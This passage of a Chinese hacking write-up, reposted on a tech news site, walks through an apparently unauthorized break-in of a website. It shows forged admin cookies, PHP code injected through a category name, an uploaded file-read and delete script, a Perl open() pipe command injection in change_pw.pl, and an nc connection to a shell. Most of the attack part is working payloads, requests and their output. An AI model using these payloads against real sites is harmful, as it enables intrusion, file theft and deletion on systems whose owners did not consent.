扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
以下是代码片段:
<%
response.cookies("bymid")="adminuser"
response.cookies("bympwd")="596a96cc7bf91abcd896f33c44aedc8a"
%>
然后访问这个asp文件
http://www.target.org/~shuaishuai/down_sys/admin/cookie.asp
留着这个窗口,把IP改回为原来的192.168.0.1,接着用这个窗口请求
http://www.target.org/~shuaishuai/down_sys/admin/admin.php
管理界面出来了,通过了验证。接着我们来上传文件...可下面的事让我们气恼了好久,竟然没有上传文件的功能,Fiant,是一个没开发完全的半成品,彻底失望了吗? 不,我们依然有信心,接着查看一下其他的文件,看看能不能对配置文件动点手脚,我们找到了一个class.php,里面保存的是下载系统的一些软件分类信息,内容看起来像这样:
5|安全工具|1028372222
8|红客工具|1034038173
7|其它软件|1034202097
....
我们试着往里面写东西,于是在管理页面新添加一个主分类,分类的名称为"<?copy ($a,$b);unlink($a);?>",提交过后class.php变成了这样
5|安全工具|1028372222
8|红客工具|1034038173
7|其它软件|1034202097
9|<?copy($a,$b);unlink($a);?>|1054035604
这个php文件可以让我们上传文件到有权限目录和删除有权限删除的文件。于是我们在本地写了一个表单,上传一个phpshell上去,然后访问
http://www.target.org/~shuaishuai/down_sys/data/sh.php
GOOD,返回了phpshell的界面...一阵高兴过后,我们才发现这个phpshell什么命令都不能执行,原来网站PHP打开了safe_mode功能,限制我们执行命令。但我们已经有了很大的突破了,可以向服务器上传文件了。接下来我们利用PHP丰富的内置函数写了很多小脚本上传测试,很不幸,系统利用 disable_functions 禁止了大部分的文件系统函数、目录函数...好在并没有赶尽杀绝,最后我们写了下面一个php程序来查看一些有权限查看的目录和文件:
以下是代码片段:
<?
$c = $HTTP_GET_VARS["c"];
$f = $HTTP_GET_VARS["f"];
if($c=="file") {
$file=readfile($f);
echo $file;
}
if($c=="dir") {
$h=opendir($f);
while($file=readdir($h)) {
echo "$file\n";
}
}
if($c=="del") {
unlink($f);
}
?>
在做了很多尝试过后,我们发现在PHP上不能获得新的突破,好在我们可以利用上面那个php程序来查看www.target.org/cgi-bin/club/scripts/ 目录中程序脚本的完整的代码,于是我们决定改向回到起点、查看CGI文件,由于没有权限向可执行CGI程序的目录里写文件, 新写一个CGI程序来执行命令是不现实的,所以决定利用现有的.pl程序来插入命令,目标自然是放在perl的open函数上,于是我们开始查找哪些程序用了open函数,但找了好多.pl文件,都没有发现,但却看到有好多readfile()函数,记得perl里面是没有这个函数的,但这里却用了很多readfile(),为什么呢?这肯定是他们自已定义的一个函数,我们看到每一个.pl文件前几行都有一个use Club;原来这里有个模块,于是查看Club.pm,很快便发现了open函数.
以下是代码片段:
sub readkey {
my($file)=@_;
unless(open(FH,"$file")) {
errmsg("对不起!你超时了,请<a href=\"$login_page\" target=\"_parent\">重新登陆</a>");
exit;
}
unless(flock(FH,LOCK_SH)) {
errmsg("Can’t Lock File: $file");
}
my $data = <FH>;
close(FH);
return $data;
}
这就是那个自定义的readfile函数,证实了我们的猜想,而且也找到了一个符合要求的open函数,接着搜寻哪个文件调用了这个函数,很快我们在change_pw.pl这个程序里找到了这个函数调用,这个程序用来修改用户的密码,不幸的是代码在判断用户旧密码是否正确前就调用了 readkey() 函数:
my $key_info=readkey("$key_dir/$key");
于是提交
>bbb%20|
再查看一下
http://www.target.org/cgi-bin/club/scripts/bbb
Yeah!成功执行了...出现了我们期望的结果,这真是太妙了,可以利用这个来执行命令,就相当于得到了一个shell。但这样办事毕竟不方便,不能及时地查看我们的运行结果。因此我们又上传了一个文件、编译、执行,然后
D:\temp>nc -vv www.target.org 12345
www.target.org [211.161.57.29] 12345 (?) open
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD ns8.target.com 4.8-RELEASE FreeBSD 4.8-RELEASE #1: Wed Apr 2 07:01:40 CST 2003
root@ns8.target.com:/usr/obj/usr/src/sys/target i386
哦,是FreeBSD 4.8-RELEASE,版本很高,提升权限比较困难,我们找了好久都没有找到有效的local exploit,提升权限失败,只好作罢。
到这里,我们的hacking基本上结束了。虽然没拿到root,但至少拿到了网站WEB权限,对于我们CGI安全爱好者来说,应该算是完成了本职工作吧-)。之后我们迅速与站主联系,提醒他网站存在安全隐患,但站主并没有向我们询问细节,他自己通过分析日志修复了漏洞。
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者